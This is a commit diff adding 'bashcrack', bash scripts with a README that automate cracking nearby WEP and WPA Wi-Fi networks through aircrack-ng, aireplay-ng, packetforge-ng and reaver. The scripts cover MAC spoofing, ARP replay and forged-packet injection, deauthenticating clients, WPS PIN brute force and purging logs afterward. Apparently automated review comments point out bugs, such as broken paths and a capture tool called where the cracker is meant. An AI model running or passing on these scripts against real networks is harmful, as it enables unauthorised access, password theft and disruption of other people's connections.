Commit 4577710e authored by Derrick Sobodash

Initial commit from Mercurial repo.

parent b5e89b12
Copyright (c) 2011, Derrick Sobodash
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
bashcrack
=========
Follow the following flow order:
1. Run 'init' to set up the system.
2. Run 'scan' to get a list of nearby WEP points. You can only crack one that
has some amount of data traffic.
3. Run 'target' and pass the BSSID, ESSID and CHANNEL of the target network
as the only paramters. For example:
./target 00:11:DE:AD:BE:EF pagefault 6
The script will echo your input back. Make sure it is valid.
4. Run 'capture' to begin collecting traffic. This script will test to make
sure your wireless device supports injection. If this step fails, your only
hope is to wait for enough traffic to pass on its own.
5. Select a method of attack:
a. Run 'flood/arp' to attempt to catch a packet from the air and hurl it
back at the ARP. It may not work.
b. Try to engineer your own forged packet. To do this, you can try to run
either 'attack/fragmentation' or 'attack/chopchop'. One of these should
create a file with a name like 'fragment*.xor'. After this file has been
created, forge a packet using 'attack/forgepacket'. You can inject this
fake packet back into the ARP with 'flood/xor'.
6. When 20,000 data packets have been collected, try running 'crack'. If there
are not enough packets to break the protection, just wait. Crack will try
again every 5,000 new packets.
7. Jot down your password and run 'cleanup' to purge all the logs and reset
your wireless device.
The files in 'cfg' control basic settings. These assume your wireless device
is wlan0 and you are using the default 'network-manager' tool.
If you are using wicd, edit './cfg/manager' and replace 'network-manager'
with 'wicd'.
If your network device is anything other than wlan0, edit './cfg/wireless'
and replace 'wlan0' with the correct name of your device.
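Review bot: the step list names scripts by paths that do not match the tree this commit adds ('flood/arp', 'attack/fragmentation', 'attack/forgepacket', 'crack'), while the cleanup script removes './wep/attack/*.xor' and './wep/flood/*.cap' and every other script sources its config through '../cfg' or '../../cfg', so each script only works when run from its own directory; document the real paths and the working-directory requirement. Two wording points: 'paramters' in step 3, and 'ARP' is used throughout where the access point is meant ('hurl it back at the ARP', 'inject this fake packet back into the ARP'); the replay in step 5a works on ARP requests, but the thing the traffic is sent to is the AP, and mixing the two terms will confuse readers. 'Follow the following flow order' reads better as 'Run the scripts in this order'.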
bashcrack
=========
Shell scripts to abstract the nitty gritty of aircrack-ng and reaver
\ No newline at end of file
# Wireless device to use
WLAN="wlan0"
# Second wireless device, if available
WLAN2=
# Wireless manager
# (this is most likely either 'network-manager' or 'wicd')
MANAGER="network-manager"
# Fake hardware address to use
FAKE_HOST="00:11:22:33:44:55"
#!/bin/bash
if [ "$(id -u)" != "0" ]; then
echo "This script must be run as root" 1>&2
exit 1
fi
. ./cfg/hardware.conf
echo "Purging crack logs..."
rm /tmp/airodump* >>/dev/null 2>&1
rm ./cfg/target.conf >>/dev/null 2>&1
rm /tmp/fake-arp >>/dev/null 2>&1
rm ./wep/attack/*.cap >>/dev/null 2>&1
rm ./wep/attack/*.xor >>/dev/null 2>&1
rm ./wep/flood/*.cap >>/dev/null 2>&1
rm /tmp/psk*.cap >>/dev/null 2>&1
echo "Switching wireless mode to managed..."
ifconfig $WLAN down
macchanger --permanent $WLAN
iwconfig $WLAN mode managed
ifconfig $WLAN -promisc
#ifconfig $WLAN -allmulti
ifconfig $WLAN multicast
ifconfig $WLAN trailers
ifconfig $WLAN up
iwconfig $WLAN channel auto
if [ "$WLAN2" != "" ]; then
ifconfig $WLAN2 down
iwconfig $WLAN2 mode managed
ifconfig $WLAN2 -promisc
ifconfig $WLAN2 multicast
ifconfig $WLAN2 trailers
ifconfig $WLAN2 up
iwconfig $WLAN2 channel auto
fi
echo "Attempting to restart network managers..."
service $MANAGER start
service avahi-daemon start
echo "Done!"
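Review bot: the relative paths here (`rm ./cfg/target.conf`, `rm ./wep/attack/*.cap`) assume the repository root as the working directory, whereas every other script assumes its own directory (`../cfg/...`, `../../cfg/...`); pick one convention, or resolve paths from the script's own location, otherwise cleanup silently removes nothing when run from elsewhere. Smaller points: `>>/dev/null 2>&1` works but `>/dev/null 2>&1` is the usual form; the commented `#ifconfig $WLAN -allmulti` line should be enabled or removed with a reason; and `service $MANAGER start` has no fallback for systems where the service name differs from the value in cfg/hardware.conf, so a failure to restore networking goes unreported apart from the service command's own output.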
#!/bin/bash
if [ "$(id -u)" != "0" ]; then
echo "This script must be run as root" 1>&2
exit 1
fi
. ./cfg/hardware.conf
#PERM_HOST=`ifconfig | grep eth0 | awk '{print $5}'`
echo "Shutting down network manager..."
service $MANAGER stop
service avahi-daemon stop
killall -15 wpa_supplicant
echo "Faking MAC address (00:11:22:33:44:55)..."
ifconfig $WLAN down
macchanger --mac $FAKE_HOST $WLAN
echo "Setting up promiscuous mode..."
iwconfig $WLAN mode monitor
ifconfig $WLAN up
if [ "$WLAN2" != "" ]; then
ifconfig $WLAN2 down
iwconfig $WLAN2 mode monitor
ifconfig $WLAN2 up
fi
echo "Done!"
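Review bot: `echo "Faking MAC address (00:11:22:33:44:55)..."` hardcodes the address instead of printing `$FAKE_HOST`, so the message becomes wrong as soon as cfg/hardware.conf is edited. `echo "Setting up promiscuous mode..."` also mislabels what follows: `iwconfig $WLAN mode monitor` switches the interface to monitor mode, which is not promiscuous mode (cleanup later runs `ifconfig $WLAN -promisc` to turn off something this script never turned on). The commented `#PERM_HOST=...` line is dead code, and `killall -15` sends SIGTERM, which is the default, so `-15` is redundant.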
#!/bin/bash
if [ "$(id -u)" != "0" ]; then
echo "This script must be run as root" 1>&2
exit 1
fi
. ./cfg/hardware.conf
if [ "$1" == "--wep" ]; then
airodump-ng -t WEP $WLAN
elif [ "$1" == "--wpa" ]; then
airodump-ng -t WPA -t WPA2 $WLAN
elif [ "$1" == "--help" ]; then
echo "Options:"
echo "--wep - Show only WEP access points"
echo "--wpa - Show only WPA access points"
echo "--all - Show all access points (default)"
else
airodump-ng $WLAN
fi
#!/bin/bash
if [ "$3" == "" ]; then
echo "Options:"
echo "[bssid] [essid] [channel] - All three parameters are required"
exit 1
fi
echo "BSSID=\"$1\"" >> ./cfg/target.conf
echo "ESSID=\"$2\"" >> ./cfg/target.conf
echo "CHANNEL=\"$3\"" >> ./cfg/target.conf
. ./cfg/target.conf
echo "Your target network is:"
echo " bssid: $BSSID"
echo " essid: $ESSID"
echo " channel: $CHANNEL"
echo "Does this look right?"
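Review bot: `echo "BSSID=\"$1\"" >> ./cfg/target.conf` appends, so every rerun adds another three lines and the file accumulates stale targets until cleanup deletes it (the sourced values happen to be the last ones written, which hides the problem); the first write should use `>`, or the file should be removed first. The argument check only tests that `$3` is non-empty, so an ESSID containing spaces shifts the arguments unless the caller quotes it, and `echo "Does this look right?"` never reads an answer; either drop the question or `read` a confirmation before writing the file. This script also writes to `./cfg/` while all other scripts read `../cfg/`, the working-directory mismatch noted for the README.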
#!/bin/bash
if [ "$(id -u)" != "0" ]; then
echo "This script must be run as root" 1>&2
exit 1
fi
. ./cfg/hardware.conf
if [ "$WLAN2" != "" ]; then
echo "Testing injection using wlan to wlan..."
echo "Injecting from $WLAN..."
aireplay-ng -9 -i $WLAN2 $WLAN
echo ""
echo "Injecting from $WLAN2..."
aireplay-ng -9 -i $WLAN $WLAN2
else
echo "Testing injection using wlan to arp..."
aireplay-ng -9 $WLAN
fi
#!/bin/bash
if [ "$(id -u)" != "0" ]; then
echo "This script must be run as root" 1>&2
exit 1
fi
if [ -f ../../cfg/target.conf ]; then
. ../../cfg/target.conf
else
echo "Error: No target set!"
exit 1
fi
. ../../cfg/hardware.conf
echo "This attack grabs a data packet and passes it back. When successful, it will generate"
echo "a fragment*.xor file in this folder."
aireplay-ng -4 -b $BSSID -h $FAKE_HOST $WLAN
echo ""
echo "Now you should run forgepacket to use the new xor file to make an ARP packet!"
#!/bin/bash
if [ -f ../../cfg/target.conf ]; then
. ../../cfg/target.conf
else
echo "Error: No target set!"
exit 1
fi
. ../../cfg/hardware.conf
DESTIP=255.255.255.255
SRCIP=255.255.255.255
echo "Attempting to forge a packet and store it to /tmp/fake-arp..."
packetforge-ng -0 -a $BSSID -h $FAKE_HOST -k $DESTIP -l $SRCIP -y `ls $PWD | grep '.xor'` -w /tmp/fake-arp
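Review bot: the `-y \`ls $PWD | grep '.xor'\`` command substitution is fragile: the grep pattern is an unanchored regex (the dot matches any character), and if more than one .xor file is present the substitution expands to several words, so packetforge-ng receives extra arguments. A shell glob (`*.xor`) with a check that exactly one file matches would make the failure explicit. Unlike the other scripts this one has no root check; if that is deliberate because packetforge-ng only reads and writes files, a comment saying so would help the next reader.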
#!/bin/bash
if [ "$(id -u)" != "0" ]; then
echo "This script must be run as root" 1>&2
exit 1
fi
if [ -f ../../cfg/target.conf ]; then
. ../../cfg/target.conf
else
echo "Error: No target set!"
exit 1
fi
. ../../cfg/hardware.conf
echo "This attack grabs a data packet and passes it back. When successful, it will generate"
echo "a fragment*.xor file in this folder."
aireplay-ng -5 -b $BSSID -h $FAKE_HOST $WLAN
echo ""
echo "Now you should run forgepacket to use the new xor file to make an ARP packet!"
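Review bot: both `echo` messages here are copied verbatim from the chopchop script, so a user cannot tell from the output which attack is running; the messages should name the technique (this script runs `aireplay-ng -5`, attack/chopchop runs `-4`). Both scripts also announce a `fragment*.xor` output name; verify that the printed name matches what each aireplay-ng mode actually writes. Neither script checks aireplay-ng's exit status, so the 'Now you should run forgepacket' hint is printed even after a failure; an `exit` on non-zero status before the hint would avoid that.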
#!/bin/bash
if [ "$(id -u)" != "0" ]; then
echo "This script must be run as root" 1>&2
exit 1
fi
if [ -f ../cfg/target.conf ]; then
. ../cfg/target.conf
else
echo "Error: No target set!"
exit 1
fi
. ../cfg/hardware.conf
echo "Looping auth requests..."
aireplay-ng -1 600 -o 1 -q 10 -e $ESSID -a $BSSID - $FAKE_HOST $WLAN
# Can try removing -1 6000 if it fails
#!/bin/bash
if [ "$(id -u)" != "0" ]; then
echo "Error: This script must be run as root" 1>&2
exit 1
fi
if [ -f ../cfg/target.conf ]; then
. ../cfg/target.conf
else
echo "Error: No target set!"
exit 1
fi
. ../cfg/hardware.conf
ifconfig $WLAN down
iwconfig $WLAN mode managed
ifconfig $WLAN up
iwconfig $WLAN channel $CHANNEL
ifconfig $WLAN down
iwconfig $WLAN mode monitor
ifconfig $WLAN up
echo "Testing whether we can inject into the ARP..."
TEST=`aireplay-ng -1 0 -e $ESSID -a $BSSID -h $FAKE_HOST $WLAN | grep "Association successful"`
# Can try removing -o 1 if it fails
if [ "${TEST}" != "" ]; then
echo "Successful!"
echo "Beginning packet capture."
airodump-ng -c $CHANNEL -w /tmp/airodump --bssid $BSSID $WLAN
else
echo "Failed to associate."
echo "Aborting capture."
fi
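Review bot: the comment `# Can try removing -o 1 if it fails` refers to an option that does not appear in the command above it (the `-o 1` is in flood/auth), so it is stale; update or drop it. The managed/channel/monitor toggle sequence (`ifconfig $WLAN down` through `iwconfig $WLAN mode monitor` / `ifconfig $WLAN up`) is duplicated verbatim in wpa/capture and the reaver script and belongs in a shared helper sourced from cfg. The capture is written to /tmp/airodump, which any local user can read until cleanup runs; a root-only directory is the safer place for captured traffic.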
#!/bin/bash
if [ -f ../cfg/target.conf ]; then
. ../cfg/target.conf
else
echo "Error: No target set!"
exit 1
fi
aircrack-ng -b $BSSID /tmp/airodump*.cap
#!/bin/bash
if [ "$(id -u)" != "0" ]; then
echo "This script must be run as root" 1>&2
exit 1
fi
if [ -f ../../cfg/target.conf ]; then
. ../../cfg/target.conf
else
echo "Error: No target set!"
exit 1
fi
. ../../cfg/hardware.conf
echo "We will now try to capture an ARP request. This may take a while on some networks."
echo "The injection attack will begin once we intercept a request."
aireplay-ng -3 -b $BSSID -h $FAKE_HOST $WLAN
#aireplay-ng -1 6000 -o1 -q 12 -e $ESSID -a $BSSID -h $FAKE_HOST $WLAN
#!/bin/bash
if [ "$(id -u)" != "0" ]; then
echo "This script must be run as root" 1>&2
exit 1
fi
if [ -f ../../cfg/target.conf ]; then
. ../../cfg/target.conf
else
echo "Error: No target set!"
exit 1
fi
. ../../cfg/hardware.conf
echo "We will now start sending our fake packet to the ARP."
echo "Watch your capture logs. Traffic should begin immediately."
aireplay-ng -2 -r /tmp/fake-arp $WLAN
#!/bin/bash
if [ "$(id -u)" != "0" ]; then
echo "This script must be run as root" 1>&2
exit 1
fi
if [ -f ../cfg/target.conf ]; then
. ../cfg/target.conf
else
echo "Error: No target set!"
exit 1
fi
ifconfig $WLAN down
iwconfig $WLAN mode managed
ifconfig $WLAN up
iwconfig $WLAN channel $CHANNEL
ifconfig $WLAN down
iwconfig $WLAN mode monitor
ifconfig $WLAN up
. ../cfg/hardware.conf
airodump-ng -c $CHANNEL --bssid $BSSID -w /tmp/psk $WLAN
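Review bot: `$WLAN` is used by the `ifconfig`/`iwconfig` block before `. ../cfg/hardware.conf` is sourced on the line just before `airodump-ng`, so the interface toggling in this script runs with an empty interface name and fails; move the source line up beside the target.conf source, as wep/capture does. The toggle sequence itself is the same duplicated block noted in wep/capture.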
#!/bin/bash
if [ -f $1 ] && [ "$1" != "" ]; then
airolib-ng $2 --import cowpatty $1
else
echo "Options:"
echo "[wordlist] [database] - Path to password list and database target"
exit 1
fi
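Review bot: `[ -f $1 ] && [ "$1" != "" ]` tests in the wrong order and without quoting: with no argument `[ -f ]` is a one-argument test that evaluates true, and only the second test saves the script from running `airolib-ng` with an empty path. Test `-n "$1"` first and quote `"$1"` in the file test. `$2` (the database path) is never validated, so when it is omitted `airolib-ng` is invoked with an empty database argument even though the usage text says both parameters are required.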
#!/bin/bash
if [ -f ../cfg/target.conf ]; then
. ../cfg/target.conf
else
echo "Error: No target set!"
exit 1
fi
. ../cfg/hardware.conf
if [ -f $1 ] && [ "$1" != "" ]; then
airodump-ng -w $1 -b $BSSID psk*.cap
else
echo "Options:"
echo "[filename] - Path to password list or hash database"
exit 1
fi
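Review bot: `airodump-ng -w $1 -b $BSSID psk*.cap` invokes the capture tool where the cracking tool is clearly meant (compare `aircrack-ng -b $BSSID /tmp/airodump*.cap` in wep/crack), and it reads `psk*.cap` from the working directory while wpa/capture writes to `/tmp/psk`, so as committed this script cannot find the capture it is meant to process. The same `[ -f $1 ] && [ "$1" != "" ]` ordering and quoting issue as in the import script applies here, and the usage text promises to accept either a word list or a hash database while the command handles only one kind of input.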
#!/bin/bash
if [ "$(id -u)" != "0" ]; then
echo "This script must be run as root" 1>&2
exit 1
fi
if [ -f ../cfg/target.conf ]; then
. ../cfg/target.conf
else
echo "Error: No target set!"
exit 1
fi
. ../cfg/hardware.conf
if [ "$1" == "--client" ]; then
echo "Sending DEAUTH request to $2 on $ESSID..."
aireplay-ng -0 3 -a $BSSID -c $2 $WLAN
else
echo "Options:"
echo "--client [xx:xx:xx:xx:xx:xx] - MAC address of client to bump"
fi
#!/bin/bash
if [ "$(id -u)" != "0" ]; then
echo "This script must be run as root" 1>&2
exit 1
fi
if [ -f ../cfg/target.conf ]; then
. ../cfg/target.conf
else
echo "Error: No target set!"
exit 1
fi
. ../cfg/hardware.conf
DELAY=0
if [ "$1" == "--help" ]; then
echo "Options:"
echo "--delay # - Specify delay between pin attempts"
elif [ "$1" == "--delay" ]; then
DELAY=$2
fi
ifconfig $WLAN down
iwconfig $WLAN mode managed
ifconfig $WLAN up
iwconfig $WLAN channel $CHANNEL
ifconfig $WLAN down
iwconfig $WLAN mode monitor
ifconfig $WLAN up
#reaver -i $WLAN -b $BSSID -m $FAKE_HOST -c $CHANNEL -v -d $DELAY -f -a
reaver -i $WLAN -b $BSSID -m $FAKE_HOST -c $CHANNEL -v -d 0 -f -a
# Is -E needed?
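Review bot: the `--delay` option is parsed into `DELAY` but never used: the line that passes `-d $DELAY` is commented out and the live command hardcodes `-d 0`, so the documented option is silently ignored; either use `$DELAY` or remove the option from the help text. `--help` also falls through after printing the options and runs the full script, because nothing exits after the `echo` lines; add `exit 0` there. The trailing `# Is -E needed?` is an open question that belongs in an issue or commit message rather than in committed code.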